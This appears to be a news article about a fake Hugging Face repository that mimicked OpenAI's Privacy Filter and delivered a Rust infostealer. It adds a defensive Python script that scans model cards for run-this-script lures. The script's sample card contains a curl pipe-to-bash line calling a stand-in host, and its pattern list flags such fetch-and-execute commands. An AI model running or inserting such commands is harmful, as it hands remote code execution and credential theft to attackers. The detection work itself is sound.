A fake AI model repository mimicking OpenAI's Privacy Filter rocketed to the top of Hugging Face's trending charts. It wasn't a model; it was a sophisticated infostealer.
The repository, published by an account named "Open-OSS," copied OpenAI's model card exactly. The only difference: instructions to download and run a malicious script.
Within 18 hours of publication, it logged 244,000 downloads and 667 likes. AI security firm HiddenLayer found that 657 of those likes came from bot accounts. The download numbers were likely inflated too: manufactured social proof to make the bait look real.
The malware was a six-stage infostealer written in Rust. It targeted Windows systems, disabling security checks, pulling commands from a hidden server, and deploying a custom payload. The final code stole everything: browser passwords, Discord tokens, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and full screenshots. It then packed the data in a compressed JSON bundle and sent it to attacker-controlled servers.
The attackers used fake training progress bars in the loader script to look legitimate. The malware checked for virtual machines or security sandboxes and shut down if detected. The full chain ran, collected data, and deleted itself, leaving almost no trace.
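As an added example (not code from the article, HiddenLayer, or Hugging Face), here is a small Python vetting check that flags the kind of lure described above: a model card that tells the reader to download and run a script, or that points to hosts outside the hub. Both sample cards and the host `example.invalid` are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a card that copies a legitimate-looking README but
# adds "download and run this script" instructions (not the real Open-OSS card).
SAMPLE_CARD = """---
license: apache-2.0
---
# Privacy Filter
A lightweight classifier for redacting PII.

## Quick start
Download the helper and run it before loading the weights:

    curl -sL https://example.invalid/setup.sh | bash
    python install_filter.py --apply
"""

# Constructed benign card: only loads weights through a library.
BENIGN_CARD = """# Privacy Filter
Load with:

    from transformers import pipeline
    clf = pipeline("text-classification", model="example-org/privacy-filter")

See https://huggingface.co/docs for details.
"""

# Patterns that indicate the card asks the reader to fetch and execute
# something, rather than just load weights with a library.
RUN_PATTERNS = [
    r"curl[^\n|]*\|\s*(ba)?sh",                              # pipe-to-shell
    r"wget[^\n|]*\|\s*(ba)?sh",
    r"(?i)\b(download|fetch) .{0,40}\b(run|execute)\b",      # "download X and run it"
    r"(?m)^\s*(python|python3|powershell|bash|sh)\s+\S+\.(py|ps1|sh)",  # run a script file
]

def external_hosts(card: str, hub_host: str = "huggingface.co") -> list:
    """Hosts of URLs in the card that are not the hosting hub (assumed huggingface.co)."""
    hosts = set()
    for url in re.findall(r"https?://[^\s)\"'<>]+", card):
        host = urlparse(url).hostname or ""
        if host and not host.endswith(hub_host):
            hosts.add(host)
    return sorted(hosts)

def vet_model_card(card: str) -> dict:
    """Return matched run-instruction patterns, off-hub hosts, and an overall flag."""
    findings = [p for p in RUN_PATTERNS if re.search(p, card)]
    hosts = external_hosts(card)
    return {"run_instructions": findings, "external_hosts": hosts,
            "suspicious": bool(findings) or bool(hosts)}
```

A flagged card is a reason to read it before fetching anything, not proof of malice; legitimate cards do sometimes link off-hub.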
This is not an isolated incident. HiddenLayer found six more malicious repositories under the account "anthfu" from late April, using the same loader and targeting models like Qwen3, DeepSeek, and Bonsai.
If you downloaded the fake filter on a Windows machine, treat the device as fully compromised. Wipe it. Change all browser credentials, even session cookies. Move any crypto funds to a new wallet on a clean system. Invalidate your Discord sessions. All SSH keys and FTP credentials should be considered burned.
Hugging Face has removed the repository but hasn't disclosed any new screening measures for trending models.
Seven confirmed malicious repos have been found so far. How many others exist remains unknown.